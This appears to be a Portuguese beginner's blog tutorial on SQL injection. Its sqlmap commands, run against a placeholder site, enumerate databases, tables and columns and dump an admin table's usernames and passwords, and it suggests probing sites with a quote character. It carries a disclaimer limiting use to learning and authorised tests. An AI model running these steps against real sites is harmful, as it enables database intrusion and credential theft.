Anúncios

Arquivo

Posts Tagged ‘sql injection’

Tutorial: SQL Injection para quem está iniciando


Olá a todos mais uma vez

Segue agora uma dica excelente para Pentest, esse breve tutorial vai mostrar uns passos básicos para explorar a vulnerabilidade de SQL Injection em alguns sites.

Lembre-se que o uso incorreto dessa técnica é crime, e o meu objetivo de mostrar essas informações aqui é apenas para aprendizado e testes em ambientes controlados e ou clientes.

Abra um terminal no backtrack e vamos usar a ferramenta SQLMAP

cd /pentest/database/sqlmap

Vamos executar o sqlmap

OBS: Os parametros dbs, dump, tables, columns devem ser precedidos de — (dois traços)

./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 dbs (vc precisa ter um alvo vulnerável para conseguir, para saber se o alvo é vulnerável, basta por uma ‘  no final da url e dar “enter” se retornar algum erro de banco de dados o alvo é vulnerável)

O campo “current database” vai mostrar o nome do BD vulnerável, daí basta usarmos as opções para explorarmos. Podemos listar todas as tabelas.

./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 -D NOMEDOBD tables

Devemos trocar NOMEDOBD pelo valor obtido em “current database”

O Resultado vai ser algo parecido com isso:

Screenshot-4

Daí podemos escolher uma tabela e listar as colunas

./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 -D NOMEDOBD -T admin columns

O resultado será parecido a esse:

Screenshot-6

Podemos escolher quais colunas queremos extrair informações

./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 -D NOMEDOBD -T admin -C id,passwrd,u_name dump

Entendendo as técnicas é possível extrair todos os dados que desejar do Banco vulnerável

Espero que tenham gostado

Por favor compartilhem

Anúncios
%d blogueiros gostam disto: